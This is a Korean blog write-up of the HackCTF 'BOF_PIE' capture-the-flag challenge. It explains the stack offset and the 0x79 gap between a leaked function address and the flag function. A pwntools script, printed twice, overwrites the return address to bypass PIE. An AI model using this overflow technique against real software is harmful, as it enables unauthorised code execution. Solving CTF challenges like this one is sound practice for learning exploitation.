[HackCTF] BOF

IDA에서 offset 확인

이전문제를 조금 응용하여 푸는것 같다

v1 = ebp - 12 = 18 + sfp = 22

jon9hyun과 welcome의 offset 차이는 0x79이다

 from pwn import *
 
p = remote("ctf.j0n9hyun.xyz", 3008)
 
p.recvuntil("Hello. Do you know j0n9hyun?")
p.recvuntil("j0n9hyun is ")
welcome_addr = int(p.recv(10),16)
flag_addr = welcome_addr-0x79
pay = b"A"*22+p32(flag_addr)
p.sendline(pay)
p.interactive()

'Write-Up > HackCTF' 카테고리의 다른 글

[HackCTF] g++ pwn 풀이 (0)	2021.09.30
[HackCTF] Yes or no (0)	2021.05.17
[HackCTF] Offset (0)	2021.05.16
[HackCTF] Simple_Overflow_ver_2 (0)	2021.05.16
[HackCTF] x64 Simple_size_BOF (0)	2021.05.16

내 블로그 - 관리자 홈 전환	`Q` `Q`
새 글 쓰기	`W` `W`

글 수정 (권한 있는 경우)	`E` `E`
댓글 영역으로 이동	`C` `C`

이 페이지의 URL 복사	`S` `S`
맨 위로 이동	`T` `T`
티스토리 홈 이동	`H` `H`
단축키 안내	`Shift` + `/` `⇧` + `/`

20's

[HackCTF] BOF_PIE

'Write-Up > HackCTF' 카테고리의 다른 글

티스토리툴바

단축키

내 블로그

블로그 게시글

모든 영역

	from pwn import *

	p = remote("ctf.j0n9hyun.xyz", 3008)

	p.recvuntil("Hello. Do you know j0n9hyun?")
	p.recvuntil("j0n9hyun is ")
	welcome_addr = int(p.recv(10),16)
	flag_addr = welcome_addr-0x79
	pay = b"A"*22+p32(flag_addr)
	p.sendline(pay)
	p.interactive()

[HackCTF] BOF_PIE

'Write-Up > HackCTF' 카테고리의 다른 글

'Write-Up/HackCTF' Related Articles

티스토리툴바

단축키

내 블로그

블로그 게시글

모든 영역